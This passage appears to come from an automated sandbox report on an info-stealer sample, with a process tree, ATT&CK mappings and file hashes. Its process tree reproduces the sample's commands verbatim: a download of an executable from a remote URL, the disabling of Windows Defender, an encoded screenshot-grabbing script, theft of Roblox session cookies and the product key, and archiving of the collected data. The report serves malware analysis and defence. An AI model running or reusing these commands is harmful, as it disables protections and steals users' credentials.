    powershell -Command "Invoke-WebRequest -Uri "https://github.com/newbigs/newintsh/releases/download/v1/jCLjDWsLU" -OutFile "C:\Users\Public\Guard.exe""
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    PID:5440
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    PID:5636
  - - C:\Users\Public\Guard.exe
      "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      PID:5908
- C:\l\winb.exe
  "C:\l\winb.exe"
  2⤵
  - Executes dropped EXE
  PID:2900
- - C:\l\winb.exe
    "C:\l\winb.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:5660
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\l\winb.exe'"
      4⤵
      PID:5756
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\l\winb.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2884
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
      4⤵
      PID:5576
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1620
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('.', 0, 'windows', 48+16);close()""
      4⤵
      PID:6084
    - - C:\Windows\system32\mshta.exe
        
        mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('.', 0, 'windows', 48+16);close()"
        5⤵
        
        PID:5012
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‎ ‏ .scr'"
      4⤵
      PID:5648
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‎ ‏ .scr'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3048
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:5320
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:4536
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:5992
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:3688
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
      4⤵
      PID:5248
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
        5⤵
        
        PID:4544
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
      4⤵
      Clipboard Data
      PID:468
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-Clipboard
        5⤵
        Clipboard Data
        
        PID:2412
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:4008
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:384
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:4092
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:5848
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
      4⤵
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:4576
    - - C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        5⤵
        Event Triggered Execution: Netsh Helper DLL
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:2408
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "systeminfo"
      4⤵
      PID:3244
    - - C:\Windows\system32\systeminfo.exe
        
        systeminfo
        5⤵
        Gathers system information
        
        PID:2032
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
      4⤵
      PID:3840
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        5⤵
        
        PID:3000
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0xuunjop\0xuunjop.cmdline"
        6⤵
        
        PID:2916
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5951.tmp" "c:\Users\Admin\AppData\Local\Temp\0xuunjop\CSCEB59FB8F62534BEFB26534B397C78F5.TMP"
        7⤵
        
        PID:3004
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:5744
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:5636
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:5644
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:5796
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:5480
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:5216
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:3188
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:6104
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:3296
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:3148
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:1856
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4016
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:1660
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        
        PID:5720
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "getmac"
      4⤵
      PID:4408
    - - C:\Windows\system32\getmac.exe
        
        getmac
        5⤵
        
        PID:3292
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI29002\rar.exe a -r -hp"newgen" "C:\Users\Admin\AppData\Local\Temp\lv5s2.zip" *"
      4⤵
      PID:2412
    - - C:\Users\Admin\AppData\Local\Temp\_MEI29002\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI29002\rar.exe a -r -hp"newgen" "C:\Users\Admin\AppData\Local\Temp\lv5s2.zip" *
        5⤵
        Executes dropped EXE
        
        PID:2096
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
      4⤵
      PID:444
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        5⤵
        
        PID:5072
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
      4⤵
      PID:2440
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        5⤵
        
        PID:5824
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:2488
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:5536
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
      4⤵
      PID:6124
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6120
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:1872
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:3188
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
      4⤵
      PID:5664
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        5⤵
        
        PID:1292
- C:\Users\Public\jsc.exe
  C:\Users\Public\jsc.exe
  2⤵
  PID:4388

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:536

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:4100

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1912

C:\Users\Admin\AppData\Roaming\notepad.exe
C:\Users\Admin\AppData\Roaming\notepad.exe
1⤵
- Executes dropped EXE
PID:228

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
f39192334a9b05f4256afe814a932cd3

SHA1
9f472226792013dabb4f3038339a4d53426730e7

SHA256
4f536c678204f74ae1fa8fb2438c3842ae0274b0d6b7db387555729b615308ff

SHA512
6f687c7c12a655ee121e96fba376a7e9c051d2ba132243822f471d8eb0e8704c3b82e72f153682faddacaccd5f44338bcadf4c31b07f85e21008f7151309dce6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
b6e7ec0adb505a0068c4e02e046e98de

SHA1
499295e73b9ccda10ef8ec997c1fbaf2b14db4cf

SHA256
fd023677656e6b0bd7bcbf6c79971129fa4390a407e84e32f9539e0140b1dc43

SHA512
e8af21e1b1d53e6eecbaf45c28736555c2d75c38dcbfbb3e37086600d1d1825cba2fe7b61f7cfe3b2ad93ffd3f9d0283afb935bccaa12a593a285eadb2039653

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
e3a060daec6c6031b291c022e588f167

SHA1
fa663e682e246d2cccc399ecd58e33d7903cc930

SHA256
b9576b7384e708670c8cf62e308eafb71196d1229d434d4b0974308aec2a5f57

SHA512
d0239e08700cad91f00ea15cedaba99e19aacfe5f1467b8ad5225f0762cc3454cb13ed84b47c6caeeaf28f5930a98b23f3a5a19d0ee28c43d2b8b6badad26b85

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Last Browser

Filesize
106B

MD5
de9ef0c5bcc012a3a1131988dee272d8

SHA1
fa9ccbdc969ac9e1474fce773234b28d50951cd8

SHA256
3615498fbef408a96bf30e01c318dac2d5451b054998119080e7faac5995f590

SHA512
cea946ebeadfe6be65e33edff6c68953a84ec2e2410884e12f406cac1e6c8a0793180433a7ef7ce097b24ea78a1fdbb4e3b3d9cdf1a827ab6ff5605da3691724

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Last Version

Filesize
14B

MD5
ef48733031b712ca7027624fff3ab208

SHA1
da4f3812e6afc4b90d2185f4709dfbb6b47714fa

SHA256
c9ce8dbbe51a4131073db3d6ceef1e11eaca6308ad88a86125f221102d2cee99

SHA512
ce3a5a429e3796977a8019f47806b8c0671b597ead642fcbfbe3144e2b8112d35a9f2250896b7f215d237d0d19c5966caf3fe674165a6d50e14cb2b88c892029

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
116KB

MD5
523991de7aa687f79d31876bd8f8ddad

SHA1
ed7537ee50e3a0b03ed88d4521f0ffd9ca3445a9

SHA256
ebf9a538c3632cc5e488dabee560b1ea6b599d9e6e7c424ee15453dd820ea659

SHA512
